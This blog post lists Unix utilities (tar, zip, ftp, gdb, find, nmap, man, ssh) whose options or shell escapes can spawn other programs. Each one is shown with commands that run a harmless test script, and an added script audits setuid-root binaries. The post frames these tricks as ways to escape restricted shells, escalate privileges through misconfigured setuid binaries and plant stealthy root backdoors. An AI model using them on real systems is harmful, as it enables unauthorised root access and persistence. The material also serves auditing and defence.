I know, I know, the title may be a bit confusing. I'll explain.
Imagine that you've found your way into a router or network gateway device, but you're stuck with a lousy restricted shell that only gives you access to a handful of essential utilities. Or you've discovered that some binaries are setuid root when they shouldn't be (nmap, say), and you're wondering whether you can spawn a root shell from them one way or another. Or you ARE root, and you want to plant a sneaky backdoor by making a common utility setuid root so that you can use it to regain privileges later. Either way, what you're looking for is a utility with options (or interactive escapes) that you can abuse to spawn any other program from inside that utility. One caveat for the setuid case: if /bin/sh is bash, it resets its effective uid to the real uid on startup unless started with -p, so a shell script payload like the one below may land you in a shell that has already dropped the privileges you were after; a compiled payload, or a shell started with -p, keeps them.
First, the test script. It echoes a message naming the program that invoked it (the parent process's command name):
$ cat test.sh
#!/bin/sh
# Look up the parent process's command name so we can see which utility spawned us.
CALLER="$(ps -o comm= $PPID)"
echo "This shell script was invoked by $CALLER" >&2
$ ./test.sh
This shell script was invoked by bash
Now, the programs you can use. Many of these were taken from this blog post by @0xmitsurugi.
tar (GNU tar; --checkpoint-action=exec, -I/--use-compress-program, --to-command and --rsh-command all run a program you name, and the last one errors out only after the script has already run):
$ touch dummyfile
$ tar czf dummy.tar --checkpoint=1 --checkpoint-action="exec=./test.sh" dummyfile
This shell script was invoked by tar
$ tar cf dummy2.tar -I "./test.sh" dummyfile
This shell script was invoked by tar
$ tar xf dummy.tar --to-command=./test.sh
This shell script was invoked by tar
$ tar cf fake@localhost:/fake/fake.tar --rsh-command=./test.sh dummyfile
This shell script was invoked by tar
tar: fake@localhost\:/fake/fake.tar: Cannot open: Input/output error
tar: Error is not recoverable: exiting now
zip (-TT replaces the command used to test the archive; zip runs it through a shell, which is why the parent shows up as sh):
$ zip dummy.zip -T -TT ./test.sh
This shell script was invoked by sh
test of dummy.zip OK
ftp, telnet, gdb etc. (interactive programs with a ! shell escape):
$ ftp
ftp> ! ./test.sh
This shell script was invoked by ftp
ftp> exit
$ gdb -q
(gdb) ! ./test.sh
This shell script was invoked by gdb
(gdb) exit
You can also execute commands from vim with :! (or drop to a shell with :sh).
find (this one should be pretty obvious, -exec does exactly what it says):
$ find -name dummyfile -exec ./test.sh \;
This shell script was invoked by find
nmap (this is awesome for stealthy backdoors, because many of nmap's functions require root anyway, so a setuid root nmap is not out of the ordinary). The os.execute call runs when NSE loads the script file, so the command executes even though nmap then rejects the script for lacking an action field; older releases additionally had an --interactive mode with a ! shell escape:
$ cat exec.lua
os.execute("./test.sh");
$ nmap --script exec.lua -p80 localhost
Starting Nmap 6.47 ( http://nmap.org ) at 2015-11-20 17:03 CET
NSE: Warning: Loading 'exec.lua' -- the recommended file extension is '.nse'.
This shell script was invoked by sh
NSE: failed to initialize the script engine:
/usr/bin/../share/nmap/nse_main.lua:559: exec.lua is missing required field: 'action'
stack traceback:
[C]: in function 'error'
/usr/bin/../share/nmap/nse_main.lua:559: in function 'new'
/usr/bin/../share/nmap/nse_main.lua:788: in function 'get_chosen_scripts'
/usr/bin/../share/nmap/nse_main.lua:1276: in main chunk
[C]: in ?
QUITTING!
You can also make use of this Metasploit module.
man (-P replaces the pager that man hands the page to):
$ man -P ./test.sh man
This shell script was invoked by man
ssh (ProxyCommand runs the program in place of opening a network connection; it can also be passed on the command line as -o ProxyCommand=./test.sh, no config file needed; thanks to http://www.hackdog.me/wordpress/archives/454):
$ cat ~/.ssh/config
host lol
hostname localhost
user inability
ProxyCommand ./test.sh
$ ssh lol
This shell script was invoked by ssh
ssh_exchange_identification: Connection closed by remote host
$ slogin lol
This shell script was invoked by slogin
ssh_exchange_identification: Connection closed by remote host
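Turning the list above into a quick audit, as an added example that is not part of the original post: the script below takes a list of setuid-root binaries and flags the ones named on this page as able to spawn other programs, and it includes a small privilege check you can drop into a payload to see whether the spawned shell actually kept an elevated effective uid (the caveat about bash resetting its euid). The utility list and the sample paths are constructed here; the live scan is only run when you pass --audit.

```shell
#!/bin/sh
# Added example (not from the original post): audit setuid-root binaries
# against the utilities listed on this page that can spawn arbitrary programs.

# Utilities from the post whose options or interactive escapes run a program
# of the caller's choosing (constructed list; extend it as you find more).
SHELLOUT_CAPABLE="tar zip ftp telnet gdb vim find nmap man ssh slogin"

# Reads one path per line on stdin and prints, on one line and space-separated,
# the basenames that appear in SHELLOUT_CAPABLE.
flag_shellout_capable() {
    out=""
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        name=${path##*/}
        for known in $SHELLOUT_CAPABLE; do
            if [ "$name" = "$known" ]; then
                out="$out $name"
                break
            fi
        done
    done
    printf '%s\n' "${out# }"
}

# Reports whether this shell kept an effective uid different from its real uid.
# Run it from inside a payload spawned by a setuid utility: if both match, the
# shell (e.g. bash without -p) has already dropped the privileges.
priv_report() {
    ruid=$(id -ru)
    euid=$(id -u)
    if [ "$ruid" = "$euid" ]; then
        printf 'uid=%s euid=%s (no elevated privileges retained)\n' "$ruid" "$euid"
    else
        printf 'uid=%s euid=%s (elevated effective uid retained)\n' "$ruid" "$euid"
    fi
}

# Live scan of the local filesystem for setuid binaries, filtered by the list.
audit_system() {
    find / -xdev -type f -perm -4000 2>/dev/null | flag_shellout_capable
}

# Stand-alone run: --audit scans the live system; otherwise a constructed
# sample list is used so the script runs offline.
if [ "${1:-}" = "--audit" ]; then
    audit_system
else
    printf '/usr/bin/tar\n/usr/bin/passwd\n/usr/bin/nmap\n' | flag_shellout_capable
    priv_report
fi
```

On a real box, compare the --audit output against what the distribution actually ships setuid (passwd, mount and friends are expected; tar or nmap are not), and treat any hit as either a privilege-escalation path or a planted backdoor depending on which side of the fence you are on.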
These are the ones I know of. Do you know of any such utilities that also have such options?